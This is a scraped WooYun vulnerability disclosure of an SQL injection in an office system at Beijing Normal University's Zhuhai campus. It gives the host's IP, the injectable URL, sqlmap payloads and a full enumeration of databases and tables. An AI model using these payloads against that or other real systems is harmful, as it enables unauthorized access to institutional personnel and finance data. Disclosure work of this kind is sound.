北京师范大学某系统注入(SA权限) | wooyun-2015-0164257| WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0164257

漏洞标题：北京师范大学某系统注入(SA权限)

漏洞作者： Lar2y

提交时间：2015-12-24 17:37

修复时间：2015-12-29 17:38

公开时间：2015-12-29 17:38

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：20

漏洞状态：漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

2015-12-24：细节已通知厂商并且等待厂商处理中
2015-12-29：厂商已经主动忽略漏洞，细节向公众公开

简要描述：

详细说明：

北京师范大学珠海分校区办公系统SQL注入
记得还有什么任意上传GETSHELL的都自检一下吧，这里只是注入~~

漏洞证明：

地址：http://59.38.32.31:8080/login/index.jsp

注入URL：http://59.38.32.31:8080/showphoto.xf?photoid=126

sqlmap identified the following injection points with a total of 50 HTTP(s) requests:
---
Parameter: photoid (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: photoid=126 AND 6987=6987
    Type: stacked queries
    Title: Microsoft SQL Server/Sybase stacked queries (comment)
    Payload: photoid=126;WAITFOR DELAY '0:0:5'--
---
web application technology: Servlet 2.4, Tomcat 4.0.4.
back-end DBMS: Microsoft SQL Server 2008
available databases [9]:
[*] FE_APP5
[*] FE_BASE5
[*] FE_ERP
[*] master
[*] model
[*] msdb
[*] ReportServer$FEOA
[*] ReportServer$FEOATempDB
[*] tempdb

表好多，就没跑下去了。。。

Database: FE_ERP
[159 tables]
+------------------------+
| ERP_ACCOUNT_INFO       |
| ERP_APIRUN_INFO        |
| ERP_API_INFO           |
| ERP_API_VO_DETAIL      |
| ERP_API_VO_INFO        |
| ERP_COLFE_DETAIL       |
| ERP_DATA_TEST_DETAIL   |
| ERP_DATA_TEST_INFO     |
| ERP_FE_DETAIL          |
| ERP_FE_INFO            |
| ERP_FE_MAPING          |
| ERP_HISTORY_DETAIL     |
| ERP_HISTORY_INFO       |
| ERP_MESSAGE_INFO       |
| ERP_ONEKEY_DETAIL      |
| ERP_ONEKEY_INFO        |
| ERP_ORG_HISTORY        |
| ERP_ORG_HISTORY_DETAIL |
| ERP_ORG_SET            |
| ERP_ORG_SET1           |
| ERP_REGISTER_LOGIC     |
| ERP_SYNCFILTER_DETAIL  |
| ERP_SYNCFILTER_INFO    |
| ERP_SYNCTYPE_INFO      |
| ERP_SYNC_DETAIL        |
| ERP_SYNC_INFO          |
| ERP_SYNC_ORG           |
| ERP_TABLE_INFO         |
| ERP_TCOLS_INFO         |
| ERP_TEMPLATE_DETAIL    |
| ERP_TEMPLATE_INFO      |
| NC_ARAP_DJFB           |
| NC_ARAP_DJFKXYB        |
| NC_ARAP_DJLX           |
| NC_ARAP_DJZB           |
| NC_ARAP_ITEM           |
| NC_BD_ACCSUBJ          |
| NC_BD_ADDRESS          |
| NC_BD_AREACL           |
| NC_BD_BALATYPE         |
| NC_BD_BANKACCBAS       |
| NC_BD_BDINFO           |
| NC_BD_BILLTYPE         |
| NC_BD_BUSITYPE         |
| NC_BD_CALBODY          |
| NC_BD_CASHFLOW         |
| NC_BD_COMABSTR         |
| NC_BD_CORP             |
| NC_BD_COSTSUBJ         |
| NC_BD_CUBASDOC         |
| NC_BD_CUMANDOC         |
| NC_BD_CURRRATE         |
| NC_BD_CURRTYPE         |
| NC_BD_CUSTADDR         |
| NC_BD_CUSTBANK         |
| NC_BD_DEPTDOC          |
| NC_BD_GLORG            |
| NC_BD_GLORGBOOK        |
| NC_BD_INVBASDOC        |
| NC_BD_INVCL            |
| NC_BD_INVMANDOC        |
| NC_BD_JOBBASFIL        |
| NC_BD_MEASDOC          |
| NC_BD_NOTETYPE         |
| NC_BD_PAYTERM          |
| NC_BD_PSNBASDOC        |
| NC_BD_PSNCL            |
| NC_BD_PSNDOC           |
| NC_BD_SALESTRU         |
| NC_BD_SENDTYPE         |
| NC_BD_STORDOC          |
| NC_BD_SUBJASS          |
| NC_BD_TAXITEMS         |
| NC_BD_VOUCHERTYPE      |
| NC_CMP_BUSIBILL        |
| NC_CMP_BUSIBILL_B      |
| NC_CUSTOMER_SYNC       |
| NC_DEPTDOC_SYNC        |
| NC_ER_REIMTYPE         |
| NC_HI_PSNDOC_DEPTCHG   |
| NC_INVCL_SYNC          |
| NC_INVENTORY_SYNC      |
| NC_LEAVE_TYPE          |
| NC_LOAN_APPLY          |
| NC_MEANS_SYNC          |
| NC_OM_DUTY             |
| NC_OM_JOB              |
| NC_PO_PRAYBILL         |
| NC_PO_PRAYBILL_B       |
| NC_SALESTRU_SYNC       |
| NC_SALE_APPLY          |
| NC_SALE_APP_SUB        |
| NC_SM_CODETOCODE       |
| NC_SM_CREATECORP       |
| NC_SM_USER             |
| NC_SM_USERANDCLERK     |
| NC_SM_USER_ROLE        |
| NC_SO_INVTOCALBODY     |
| NC_SUBJECT_ASSIST      |
| NC_SUBJECT_ASSISTS     |
| NC_SUBJECT_SYNC        |
| NC_TBM_AWAYB           |
| NC_TBM_AWAYH           |
| NC_TBM_PSNDOC          |
| NC_TBM_TIMEITEM        |
| OA_JKD                 |
| U8_AA_AGREEMENT        |
| U8_AA_ENUM             |
| U8_AP_CLOSEBILL        |
| U8_AP_CLOSEBILLS       |
| U8_AP_VOUCH            |
| U8_AP_VOUCHS           |
| U8_CM_GROUP            |
| U8_CODE                |
| U8_COMPUTATIONUNIT     |
| U8_CUSTOMER            |
| U8_DEPARTMENT          |
| U8_DISPATCHLIST        |
| U8_DISPATCHLISTS       |
| U8_DSIGN               |
| U8_EXCH                |
| U8_FITEM               |
| U8_FITEMSS00           |
| U8_FITEMSS97           |
| U8_FITEMSS97CLASS      |
| U8_FITEMSS98           |
| U8_FOREIGNCURRENCY     |
| U8_GL_ACCVOUCH         |
| U8_GL_ACCVOUCHS        |
| U8_GRADEDEF            |
| U8_HR_HI_JOBINFO       |
| U8_HR_HI_PERSON        |
| U8_HR_OM_JOB           |
| U8_INVENTORY           |
| U8_PAYCONDITION        |
| U8_PO_PODETAILS        |
| U8_PO_POMAIN           |
| U8_PURCHASETYPE        |
| U8_PU_APPVOUCH         |
| U8_PU_APPVOUCHS        |
| U8_PU_ARRIVALVOUCH     |
| U8_PU_ARRIVALVOUCHS    |
| U8_RDRECORD01          |
| U8_RDRECORDS01         |
| U8_RD_STYLE            |
| U8_SALETYPE            |
| U8_SA_CUSUPRICE        |
| U8_SETTLESTYLE         |
| U8_SHIPPINGCHOICE      |
| U8_SO_SODETAILS        |
| U8_SO_SOMAIN           |
| U8_UA_MENU             |
| U8_UA_USER             |
| U8_VENDOR              |
| U8_VOUCHERNUMBER       |
| U8_WAREHOUSE           |
| V_ERP_API_VO_DETAIL    |
| V_SYNC_DEPLOY          |
| dtproperties           |
+------------------------+

Database: FE_BASE5
[307 tables]
+------------------------------+
| ABC                          |
| APPRV_FLOW                   |
| APPRV_FLOW_INT               |
| APPRV_FLOW_RES               |
| APPRV_FLOW_SUB               |
| APPRV_RESOURCE               |
| APPRV_RESOURCE_SUB           |
| APP_LEADER_ADD               |
| APP_LEADER_ADD_V             |
| APP_LEADER_CALENDAR          |
| APP_LEADER_SUB               |
| ARRANGE_CALENDAR             |
| ASSET                        |
| ASSET_USE                    |
| ASSET_V                      |
| CALENDAR                     |
| CHAT                         |
| COMMON_LEMMA                 |
| COMMON_LEMMA_V               |
| CTRLDATATYPE_VIEW            |
| CTRLPROPERTY_VIEW            |
| DEFINEGROUP_V                |
| DESKTOP_CONFIG_V             |
| DESKTOP_CONTAINER            |
| DESKTOP_CONTAINER_GADGET     |
| DESKTOP_CONTAINER_USER       |
| DESKTOP_GADGET               |
| DESKTOP_MENU_MANAGEMENT      |
| DESKTOP_MENU_MANAGEMENT_TEMP |
| DESKTOP_PEOPLE_PLUGIN        |
| DESKTOP_PLUGIN_MANAGEMENT    |
| DESKTOP_PLUGIN_SETTING       |
| DESKTOP_SET                  |
| DESK_USERJJCD                |
| DOCUMENTS_LIST               |
| DRAFT_CONFIG_V               |
| DRAFT_MENU_V                 |
| DRAFT_SET                    |
| ENTERPRISE_SMS               |
| FACEITEM_V                   |
| FACE_V                       |
| FE_LOG                       |
| FE_USERS                     |
| FLOWCODE_CONFIG              |
| FLOWCODE_VALUE               |
| FLOW_CLASS_SET               |
| FLOW_MENU_V                  |
| FOLDER_ATTRIBUTE             |
| FOLDER_POPUDOM               |
| FOLDER_TYPE                  |
| FUNCTION_TABLE_V             |
| GONGGAOVIEW_V                |
| GONGGAO_DESK_V               |
| GROUP_ROLE_USER_V            |
| GROUP_ROLE_V                 |
| GROUP_USER_LEVEL_V           |
| GROUP_USER_SORT_V            |
| GROUP_USER_V                 |
| GROUP_U_V_D                  |
| G_R_U_YZ_V                   |
| IDEAMANAGE                   |
| INFOR_YIBAN                  |
| LAYOUT_VIEW                  |
| LEADER_APP_V                 |
| LEADER_CALENDAR_V            |
| MESSAGEINFOR                 |
| MESSAGEINFOR_HISTORY         |
| MESSAGE_SET_V                |
| MESSAGE_USER_V               |
| MODEL_NODE_ALL_V             |
| MODEL_NODE_R_V               |
| NC_SYN_HISTORY               |
| NC_SYN_HISTORY_DETAIL        |
| NC_SYN_ORG                   |
| NEWBIE                       |
| NEWSVIEW_V                   |
| NEWS_DESK_V                  |
| PHONE_LOGIN                  |
| PLURALIST_POST_V             |
| PORTAL_CONTAINER             |
| PORTAL_INFO                  |
| PORTAL_PLUGIN                |
| PORTAL_PLUGINS               |
| PORTAL_PN_POLICY             |
| PORTAL_PN_POLICY_SUB         |
| PORTAL_PN_POPUDOM            |
| PORTAL_PN_SETUP              |
| PORTAL_PP_CONFIG             |
| PORTAL_PP_CONFIG_SUB         |
| PORTAL_SETTINGS              |
| PORTAL_SETTINGS_DETAILS      |
| PORTAL_SHOW_DEFAULT          |
| PORTAL_TEMPLATE              |
| PORTAL_USERS                 |
| PROXY_NODE                   |
| PROXY_SET                    |
| PROXY_V                      |
| QUICK_CONFIG_V               |
| RECENT_MENU_V                |
| REFERENCE_UNION              |
| REPORT_ELEMENT               |
| REPORT_FACEPROMPT_INFOR      |
| REPORT_SET                   |
| RESEARCH_OPTION              |
| RESEARCH_PUBLISHER           |
| RESEARCH_SUB                 |
| RESEARCH_TOPIC               |
| RESEARCH_TOPIC_V             |
| RESEARCH_VOTER               |
| RESOURCE_INFO                |
| RESOURCE_LIST                |
| RESOURCE_REG_SET             |
| RESOURCE_USE_SET             |
| RICHENG                      |
| RICHENG_LEADER_V             |
| ROW_POPEDOM_V                |
| SEARCH_CONFIG                |
| SFGL_FFGL_V                  |
| SMS_DRFTBL                   |
| SMS_IBXTBL                   |
| SMS_ORDTBL                   |
| SMS_SNTTBL                   |
| SMS_TOTTBL                   |
| SORT_INFOR                   |
| SORT_LINK_FIELD              |
| SORT_VIEW                    |
| STAFF_GROUP_USER_V           |
| STAMP_KEY_RELATION           |
| STOCKSP                      |
| STOCKSP_VIEW                 |
| STOCK_SUB                    |
| STOCK_SUB_TMP                |
| SYS_ATTACHMENT               |
| SYS_BIZLOGIC                 |
| SYS_CACHET                   |
| SYS_CACHETASSIGN             |
| SYS_COLLABORATIVE            |
| SYS_COLLABORATIVE_MODIFY     |
| SYS_COLLABORATIVE_MOUDLE     |
| SYS_CONTROL                  |
| SYS_CTRLDATATYPE             |
| SYS_CTRLPROPERTY             |
| SYS_CTRLPROPS                |
| SYS_CTRLPROPVIEW             |
| SYS_DATABASE                 |
| SYS_DATALINK                 |
| SYS_DATATYPE                 |
| SYS_DFGROUP                  |
| SYS_DGR                      |
| SYS_DOC_MEMU                 |
| SYS_DOC_SIGNATURE            |
| SYS_DRIVER                   |
| SYS_DUTY                     |
| SYS_EMAILINFO                |
| SYS_EVENT                    |
| SYS_EVENT_PAGE               |
| SYS_EXCEPTION                |
| SYS_EXTURL                   |
| SYS_FACE                     |
| SYS_FACECTRLPROP             |
| SYS_FACEDATABUF              |
| SYS_FACEEVENT                |
| SYS_FACEFILE                 |
| SYS_FACEITEM                 |
| SYS_FACEPROMPT               |
| SYS_FACEPROP                 |
| SYS_FACE_V                   |
| SYS_FAVORITE                 |
| SYS_FCSTYLE                  |
| SYS_FIELD                    |
| SYS_FILEBUFFER               |
| SYS_FLOWTYPE                 |
| SYS_FORM_INFO                |
| SYS_FUNCTION                 |
| SYS_FUNCTION_USER            |
| SYS_FUNCTION_temp            |
| SYS_GROUP                    |
| SYS_GROUP_LOG                |
| SYS_GROUP_TEMP               |
| SYS_GROUP_USER               |
| SYS_HOLIDAY                  |
| SYS_INDEX                    |
| SYS_IPLOGIN_RULE             |
| SYS_IPNOTVERIFY              |
| SYS_JGSTAMP                  |
| SYS_JGSTAMP_KEY              |
| SYS_JGSTAMP_RELATION         |
| SYS_LOG                      |
| SYS_LOGINKEY                 |
| SYS_LOG_SETUP                |
| SYS_MESSAGES                 |
| SYS_MOBILEINFO               |
| SYS_MON_RIGHT                |
| SYS_MWF                      |
| SYS_MWF_V                    |
| SYS_PAGE                     |
| SYS_PLUGINS                  |
| SYS_PLURALIST                |
| SYS_POPEDOM_COLUMN           |
| SYS_POPEDOM_ROW              |
| SYS_POPEDOM_TEMPLET          |
| SYS_POPEDOM_TEMP_SUB         |
| SYS_QUERY_SETUP              |
| SYS_REDIRECT                 |
| SYS_REGISTER                 |
| SYS_ROLE                     |
| SYS_SELT_LOGIC               |
| SYS_STAMP                    |
| SYS_STAMPCA                  |
| SYS_STAMPTYPE                |
| SYS_TABLE                    |
| SYS_TABLE_KEY                |
| SYS_TEST                     |
| SYS_TEST_FE35_PRO            |
| SYS_TEST_SUB                 |
| SYS_TRACK_SETUP              |
| SYS_TRACK_SETUP_SUB          |
| SYS_TRACK_VO                 |
| SYS_TRACK_VO_SUB             |
| SYS_USERS                    |
| SYS_USER_CONFIG              |
| SYS_USER_ROLE                |
| SYS_USER_SKIN                |
| SYS_USER_STATUS              |
| SYS_USER_TEMPLET             |
| SYS_VIEWSQL                  |
| SYS_WORKTIME                 |
| TABLE_FIELD_V                |
| TABLE_SORT_V                 |
| TABLE_V                      |
| TASK_FFGL_V                  |
| TASK_INOFR_USER_V            |
| TASK_SFGL_V                  |
| TASK_SUPERVISORY_V           |
| TASK_USER_V                  |
| TEMPLET_GROUP_V              |
| TESTSDDS                     |
| TRUSTDEVICELIST              |
| USER_DESKTOP_CONFIG          |
| USER_DESKTOP_RECENT          |
| USER_DOC_LIST                |
| USER_EVENT                   |
| USER_EVENT_V                 |
| USER_GROUP_DEFAULT           |
| USER_GROUP_LEFT_V            |
| USER_GROUP_V                 |
| USER_G_L_V                   |
| USER_LOAD_V                  |
| USER_RELAPER_SUB             |
| USER_RELATION_PER            |
| USER_ROLE_V                  |
| USER_R_V                     |
| USER_TEMPLET_V               |
| VACATION                     |
| VIEW_CALENDAR                |
| VIEW_DAIBAN                  |
| V_ARRANGE_CALENDAR           |
| V_LEADER_SET                 |
| V_RELATION_PER               |
| WF_ACTION                    |
| WF_CLASS                     |
| WF_CO_MODEL                  |
| WF_CO_NODE                   |
| WF_DEFAULT_CONFIG            |
| WF_DOC_ADDITIONAL            |
| WF_FLOWPIC                   |
| WF_INFOR                     |
| WF_INFOR_HURRY               |
| WF_INFOR_V                   |
| WF_INFOR_XY_V                |
| WF_LIGHT                     |
| WF_LIGHT_CONFIG              |
| WF_LINKS                     |
| WF_MODEL                     |
| WF_MONITOR_DATA              |
| WF_MONITOR_SELECTOR          |
| WF_MONITOR_SETUP             |
| WF_MONITOR_SETUP_FLOW        |
| WF_NODES                     |
| WF_NODE_TRACE                |
| WF_ROLES                     |
| WF_ROLE_ALLOC                |
| WF_SUBFLOW_BO_MAP            |
| WF_SUBFLOW_CONF              |
| WF_SUPERVISORY               |
| WF_TASK                      |
| WF_TASK_TRACER               |
| WF_TASK_TRACER_V             |
| WITSETLIST                   |
| WORKED_NODEINFO              |
| WORKFLOW_USER_V              |
| WORKPLAN                     |
| WORKPLAN_MOUDLE              |
| WORKPLAN_V                   |
| WORK_AGE_SET                 |
| WORK_LOG                     |
| WORK_LOG_V                   |
| WORK_TAG                     |
| XML_TABLE_CONF               |
| XML_TABLE_FILTER             |
| XML_TABLE_SUB                |
| XY_USER_ROLE_V               |
| dtproperties                 |
| group_aaa_temp               |
| hack                         |
| sqlmapoutput                 |
| temp_split                   |
+------------------------------+

修复方案：

修复

版权声明：转载请注明来源 Lar2y@乌云

漏洞回应

厂商回应：

危害等级：无影响厂商忽略

忽略时间：2015-12-29 17:38

厂商回复：

漏洞Rank：4 (WooYun评价)

WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0164257

漏洞标题：北京师范大学某系统注入(SA权限)

相关厂商：北京师范大学

漏洞作者： Lar2y

提交时间：2015-12-24 17:37

修复时间：2015-12-29 17:38

公开时间：2015-12-29 17:38

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：20

漏洞状态：漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 Lar2y@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

WooYun.org

漏洞概要 关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0164257

漏洞标题：北京师范大学某系统注入(SA权限)

相关厂商：北京师范大学

漏洞作者： Lar2y

提交时间：2015-12-24 17:37

修复时间：2015-12-29 17:38

公开时间：2015-12-29 17:38

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：20

漏洞状态：漏洞已经通知厂商但是厂商忽略漏洞

Tags标签： 无

4人收藏 收藏 var token=""; var id="wooyun-2015-0164257"; $(".btn-fav").click(function(){ CollectBug(id,token); }); 分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 Lar2y@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞概要关注数(24) 关注此漏洞

Tags标签：无

4人收藏收藏
分享漏洞：